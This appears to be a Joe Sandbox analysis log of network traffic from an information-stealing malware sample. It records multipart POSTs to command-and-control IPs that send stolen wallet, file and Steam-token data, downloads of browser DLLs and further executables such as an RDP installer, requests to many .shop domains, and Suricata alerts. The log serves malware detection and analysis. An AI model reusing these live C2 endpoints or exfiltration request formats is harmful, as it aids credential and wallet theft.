Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKEHIIJJECFHJKECFHDGHost: 46.8.231.109Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 45 48 49 49 4a 4a 45 43 46 48 4a 4b 45 43 46 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 36 31 61 33 30 66 66 38 63 61 39 33 30 34 66 33 30 32 33 34 61 33 65 32 38 39 37 32 38 63 65 35 62 39 64 66 30 33 61 63 35 38 66 33 64 62 37 63 64 36 37 38 37 36 35 34 35 35 34 65 62 66 61 61 32 30 34 62 32 34 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 48 49 49 4a 4a 45 43 46 48 4a 4b 45 43 46 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 48 49 49 4a 4a 45 43 46 48 4a 4b 45 43 46 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 48 49 49 4a 4a 45 43 46 48 4a 4b 45 43 46 48 44 47 2d 2d 0d 0a Data Ascii: ------JKEHIIJJECFHJKECFHDGContent-Disposition: form-data; name="token"061a30ff8ca9304f30234a3e289728ce5b9df03ac58f3db7cd6787654554ebfaa204b244------JKEHIIJJECFHJKECFHDGContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------JKEHIIJJECFHJKECFHDGContent-Disposition: form-data; name="file"------JKEHIIJJECFHJKECFHDG--
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/freebl3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/mozglue.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/msvcp140.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/nss3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/softokn3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/vcruntime140.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCFBFBAEBKJKEBGCAEHCHost: 46.8.231.109Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFCBAAEBKEGHIEBFIJJKHost: 46.8.231.109Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 43 42 41 41 45 42 4b 45 47 48 49 45 42 46 49 4a 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 36 31 61 33 30 66 66 38 63 61 39 33 30 34 66 33 30 32 33 34 61 33 65 32 38 39 37 32 38 63 65 35 62 39 64 66 30 33 61 63 35 38 66 33 64 62 37 63 64 36 37 38 37 36 35 34 35 35 34 65 62 66 61 61 32 30 34 62 32 34 34 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 42 41 41 45 42 4b 45 47 48 49 45 42 46 49 4a 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 42 41 41 45 42 4b 45 47 48 49 45 42 46 49 4a 4a 4b 2d 2d 0d 0a Data Ascii: ------CFCBAAEBKEGHIEBFIJJKContent-Disposition: form-data; name="token"061a30ff8ca9304f30234a3e289728ce5b9df03ac58f3db7cd6787654554ebfaa204b244------CFCBAAEBKEGHIEBFIJJKContent-Disposition: form-data; name="message"wallets------CFCBAAEBKEGHIEBFIJJK--
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDHIEBFHCAKEHIDGHCBAHost: 46.8.231.109Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 48 49 45 42 46 48 43 41 4b 45 48 49 44 47 48 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 36 31 61 33 30 66 66 38 63 61 39 33 30 34 66 33 30 32 33 34 61 33 65 32 38 39 37 32 38 63 65 35 62 39 64 66 30 33 61 63 35 38 66 33 64 62 37 63 64 36 37 38 37 36 35 34 35 35 34 65 62 66 61 61 32 30 34 62 32 34 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 48 49 45 42 46 48 43 41 4b 45 48 49 44 47 48 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 48 49 45 42 46 48 43 41 4b 45 48 49 44 47 48 43 42 41 2d 2d 0d 0a Data Ascii: ------JDHIEBFHCAKEHIDGHCBAContent-Disposition: form-data; name="token"061a30ff8ca9304f30234a3e289728ce5b9df03ac58f3db7cd6787654554ebfaa204b244------JDHIEBFHCAKEHIDGHCBAContent-Disposition: form-data; name="message"files------JDHIEBFHCAKEHIDGHCBA--
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKECBAKFBGDGCBGDBAECHost: 46.8.231.109Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 4b 45 43 42 41 4b 46 42 47 44 47 43 42 47 44 42 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 36 31 61 33 30 66 66 38 63 61 39 33 30 34 66 33 30 32 33 34 61 33 65 32 38 39 37 32 38 63 65 35 62 39 64 66 30 33 61 63 35 38 66 33 64 62 37 63 64 36 37 38 37 36 35 34 35 35 34 65 62 66 61 61 32 30 34 62 32 34 34 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 43 42 41 4b 46 42 47 44 47 43 42 47 44 42 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 43 42 41 4b 46 42 47 44 47 43 42 47 44 42 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 43 42 41 4b 46 42 47 44 47 43 42 47 44 42 41 45 43 2d 2d 0d 0a Data Ascii: ------BKECBAKFBGDGCBGDBAECContent-Disposition: form-data; name="token"061a30ff8ca9304f30234a3e289728ce5b9df03ac58f3db7cd6787654554ebfaa204b244------BKECBAKFBGDGCBGDBAECContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------BKECBAKFBGDGCBGDBAECContent-Disposition: form-data; name="file"------BKECBAKFBGDGCBGDBAEC--
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGHCGIIDGDAKFIEBKFCFHost: 46.8.231.109Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 47 48 43 47 49 49 44 47 44 41 4b 46 49 45 42 4b 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 36 31 61 33 30 66 66 38 63 61 39 33 30 34 66 33 30 32 33 34 61 33 65 32 38 39 37 32 38 63 65 35 62 39 64 66 30 33 61 63 35 38 66 33 64 62 37 63 64 36 37 38 37 36 35 34 35 35 34 65 62 66 61 61 32 30 34 62 32 34 34 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 43 47 49 49 44 47 44 41 4b 46 49 45 42 4b 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 43 47 49 49 44 47 44 41 4b 46 49 45 42 4b 46 43 46 2d 2d 0d 0a Data Ascii: ------CGHCGIIDGDAKFIEBKFCFContent-Disposition: form-data; name="token"061a30ff8ca9304f30234a3e289728ce5b9df03ac58f3db7cd6787654554ebfaa204b244------CGHCGIIDGDAKFIEBKFCFContent-Disposition: form-data; name="message"ybncbhylepme------CGHCGIIDGDAKFIEBKFCF--
Source: global traffic	HTTP traffic detected: GET /prog/66f5db9e54794_vfkagks.exe HTTP/1.1Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /prog/66f5dbaca34ac_lfdnsafnds.exe HTTP/1.1Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /prog/66f5d9ab0d4c7_rdp.exe HTTP/1.1Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCBFBGDBKJKECAAKKFHDHost: 46.8.231.109Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 36 31 61 33 30 66 66 38 63 61 39 33 30 34 66 33 30 32 33 34 61 33 65 32 38 39 37 32 38 63 65 35 62 39 64 66 30 33 61 63 35 38 66 33 64 62 37 63 64 36 37 38 37 36 35 34 35 35 34 65 62 66 61 61 32 30 34 62 32 34 34 0d 0a 2d 2d 2d 2d 2d 2d 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 44 2d 2d 0d 0a Data Ascii: ------FCBFBGDBKJKECAAKKFHDContent-Disposition: form-data; name="token"061a30ff8ca9304f30234a3e289728ce5b9df03ac58f3db7cd6787654554ebfaa204b244------FCBFBGDBKJKECAAKKFHDContent-Disposition: form-data; name="message"wkkjqaiaxkhb------FCBFBGDBKJKECAAKKFHD--
Source: global traffic	HTTP traffic detected: GET /prog/66f55533ca7d6_RDPWInst.exe HTTP/1.1Host: 147.45.44.104Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org

Source: Joe Sandbox View	IP Address: 46.8.231.109 46.8.231.109
Source: Joe Sandbox View	IP Address: 147.45.44.104 147.45.44.104

Source: Joe Sandbox View	ASN Name: FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics
Source: Joe Sandbox View	ASN Name: AS-PUBMATICUS AS-PUBMATICUS
Source: Joe Sandbox View	ASN Name: FREE-NET-ASFREEnetEU FREE-NET-ASFREEnetEU

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View	JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49708 -> 46.8.231.109:80
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49709 -> 147.45.44.104:80
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49733 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49732 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49736 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49737 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49728 -> 104.26.13.205:80
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49734 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49738 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49735 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49740 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49743 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49742 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49744 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49745 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49746 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49747 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49748 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49749 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49751 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49750 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49753 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49752 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49754 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49755 -> 147.45.44.104:80
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49756 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49759 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49762 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49765 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49773 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49774 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49779 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49775 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49776 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49777 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49778 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49739 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49780 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49781 -> 5.75.211.162:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: wallkedsleeoi.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: gutterydhowi.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: ghostreedmnu.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: offensivedzvju.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: vozmeatillu.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: drawzhotdog.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fragnantbui.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: stogeneratmns.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: reinforcenh.shop
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: ballotnwu.site
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GIEHJKEBAAEBGCAAEBFHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 255Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IDBAFHDGDGHDGCBFCFIDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFIEHCFIECBGCBFHIJJKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DBFBFBGDBKJJKFIEHJDBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DHCBGDHIEBFHCBFHDHDHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 6953Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GDHDHJEBGHJKFIECBGCBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 829Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JKKECBGIIIEBGCBGIDHDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GIEHJKEBAAEBGCAAEBFHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JKEGHDGHCGHDHJKFBFBKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 1145Connection: Keep-AliveCache-Control: no-cache
